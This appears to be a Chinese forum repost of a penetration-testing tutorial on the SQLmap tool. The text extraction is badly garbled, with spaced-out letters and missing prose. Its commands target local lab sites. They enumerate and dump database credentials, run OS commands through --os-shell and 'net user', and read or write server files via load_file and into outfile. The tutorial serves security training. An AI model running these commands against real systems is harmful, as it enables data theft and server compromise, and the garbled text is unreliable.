[22261] 2021-08-16_渗透测试之SQLmap使用详解

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-08-16_渗透测试之SQLmap使用详解 S Q L m a p 使 L e m o n S e c   2 0 2 1 - 0 8 - 1 6   S Q L m a p S q l M a p P y t h o n S Q L   M y S Q L O r a c l e   M i c r o s o f t   S Q L   S e r v e r P o s t g r e S Q L   M i c r o s o f t   A c c e s s I B M   D B 2   S Q L i t e F i r e b i r d S y b a s e   S A P   M a x D B 2 5     . /  
S Q L m a p : h t t p : / / s q l m a p . o r g / G i t h u b   h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p S Q L m a p 1 2 S Q L 3 4 5 6 7 W E B 8 g e t s h e l l 9 w i n d o w s 1 S Q L m a p p y t h o n p y t h o n p y t h o n h t t p s : / / w w w . p y t h o n . o r g /     2 . 6 < 3 . 0 2 S Q L m a p p y t h o n s q l m a p c m d s q l m a p 便 3 s q l m a p . p y   - h   l i n u x l i n u x 1 w g e t   h t t p s : / / c o d e l o a d . g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / l e g a c y . t a r . g z / m a s t e r   / / s q l m a p 2 t a r   z x v f   m a s t e r   / / 3 c d   s q l m a p p r o j e c t - s q l m a p - 3 1 0 d 7 9 b / / / 4 p y t h o n   s q l m a p . p y   - h     / / 使 5 k a l i S Q L m a p s q l m a p 使
S Q L M a p S Q L m a p 使 使 S Q L M a p * w a f 使   S Q L M a p     W A F   W A F s q l m a p   - u   h t t p : / / x x x . c o m   - - i d e n t i f y - w a f   - - b a t c h W A F   X X X   W e b   A p p l i c a t i o n   F i r e w a l l   w a f G e n e r i c s q l m a p w a f w a f
1 s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 9 8 . 1 2 8 / s q l i - l a b s - m a s t e r / L e s s - 1 / ? i d = 1 " - u   #   U R L   2 s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 9 8 . 1 2 8 / s q l i - l a b s - m a s t e r / L e s s - 1 / ? i d = 1 "   - - d b s - u #   U R L     - - d b s   # 3 使 使 s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 9 8 . 1 2 8 / s q l i - l a b s - m a s t e r / L e s s - 1 / ? i d = 1 "   - - c u r r e n t - d b - u #   U R L   - - c u r r e n t - d b   #   4 s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 9 8 . 1 2 8 / s q l i - l a b s - m a s t e r / L e s s - 1 / ? i d = 1 "   - D   s e c u r i t y   - - t a b l e s - u #     U R L     - D #       - - t a b l e s   #   5 s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 9 8 . 1 2 8 / s q l i - l a b s - m a s t e r / L e s s - 1 / ? i d = 1 "   - D   s e c u r i t y   - T   u s e r s   - - c o l u m n s - u #     U R L     - D #     - T #     - - c o l u m n s   # 6 s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 9 8 . 1 2 8 / s q l i - l a b s - m a s t e r / L e s s - 1 / ? i d = 1 "   - D   s e c u r i t y   - T   u s e r s   - C   u s e r n a m e     p a s s w o r d   - - d u m p - u #     U R L     - D #     - T #       - C #   - - d u m p   #   7 1 s q l m a p . p y   - - p u r g e 2 s q l m a p o u t p u t w i n d o w s c : u e r s a p p d a t a l o c a l s q l m a p l i i n u x / h o m e / t e s t / s q l m a p                 / r o o t / . s q l m a p   S Q L m a p
1 O u t p u t   v e r b o s i t y - v 使 - v   < >   s q l m a p   - u   [ U R L ]   - v   3 S Q L m a p 0 - 6 7 1 2 - - l e v e l 使 - - l e v e l   < >   s q l m a p   - u   [ U R L ]   - l e v e l   3 3 - - i s - d b a s q l m a p   - u   [ U R L ]   - - i s - d b a   / / - - r o l e s s q l m a p   - u   [ U R L ]   - - r o l e s   / / - - p r i v i l e g e s s q l m a p   - u   [ U R L ]   - - p r i v i l e g e s   / / s q l m a p   - u   [ U R L ]   - - p r i v i l e g e s   - U   s a   / / s a 4
- - u s e r s   / / - - p a s s w o r d s   / / s q l m a p   - u   [ U R L ]   - - u s e r s   - - p a s s w o r d s - - c u r r e n t - u s e r   / / - - c u r r e n t - d b   / / 5 s h e l l - o s - c m d   /   - o s - s h e l l 使 s q l m a p   - u   [ U R L ]   - -   o s - c m d =   "   n e t   u s e r   "   / / n e t   u s e r s q l m a p   - u   [ U R L ]   - -   o s - s h e l l   / / s h e l l 1 使   2 m y s q l p o s t g r e s q l s q l s e r v e r   6 P O S T 1 . - d a t a   / / p o s t 2 . - r   t x t   / / H T T P P O S T H T T P   H e a d e r 使 s q l m a p   - u   [ U R L ]   - - d a t a   " P O S T "     s q l m a p   - u   [ U R L ]   - r   " . t x t " c o o k i e
7 u s e r - a g e n t 8 r e f e r e r 9 - b     - - b a n n e r s q l m a p   - u   [ U R L ]   - - b a n n e r 1 0 - - t a m p e r S Q L M a p S Q L 1 S Q L - - s q l - s h e l l s q l m a p   - u   [ U R L ]   - - s q l - s h e l l S Q L s h e l l S Q L   x q 退
  2 S Q L - - s q l - q u e r y s q l m a p   - u   [ U R L ]   - - s q l - q u e r y = s q l   s q l m a p . p y   - u   " h t t p : / / 1 0 . 1 . 1 . 1 3 6 / v u l n e r a b i l i t i e s / s q l i / ? i d = 1 - - s q l - q u e r y   " s e l e c t   u s e r ( ) , v e r s i o n ( ) , d a t a b a s e ( ) " S Q L - - s q l - s h e l l   3 S Q L - - s q l - f i l e s q l m a p   u   [ U R L ]   - - s q l - f i l e = s q l S Q L S Q L 1 . s q l s e l e c t   v e r s i o n ( ) ; s e l e c t   @ @ d a t a d i r ; s q l m a p   s q l m a p   - u   [ u r l ]   - - s q l - f i l e = 1 . s q l M y S Q L M y S Q L S Q L M a p w e b S Q L r o o t g e t s h e l l S Q L 1   s e c u r e - f i l e - p r i v m y . i n i   s e c u r e - f i l e - p r i v = n u l l   m y s q l d s e c u r e - f i l e - p r i v s e l e c t   @ @ s e c u r e _ f i l e _ p r i v   2  
- - f i l e - r e a d s q l m a p   - u   [ U R L ]   - - f i l e - r e a d   m y s q l l o a d _ f i l e   l o a d _ f i l e ( ' c : / w i n d o w s / w i n . i n i ' ) [ s e l e c t   F i l e _ p r i v   f r o m   m y s q l . u s e r   w h e r e   u s e r = " r o o t "   a n d   h o s t = " l o c a l h o s t " ] r o o t m y s q l p o s t g r e s q l s q l s e r v e r m a x _ a l l o w e d _ p a c k e d / / - - f i l e - w r i t e   - - f i l e - d e s t s q l m a p   - u   [ U R L ]   - - f i l e - w r i t e     - - f i l e - d e s t   m y s q l i n t o   o u t f i l e   u n i o n   s e l e c t   1 , 2 ,   ' a a a '   i n t o   o u t f i l e   ' C : p h p s t u d y _ p r o w w w t e s t 1 . t x t '   s e c u r e - f i l e - p r i v r o o t m y s q l p o s t g r e s q l s q l s e r v e r

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则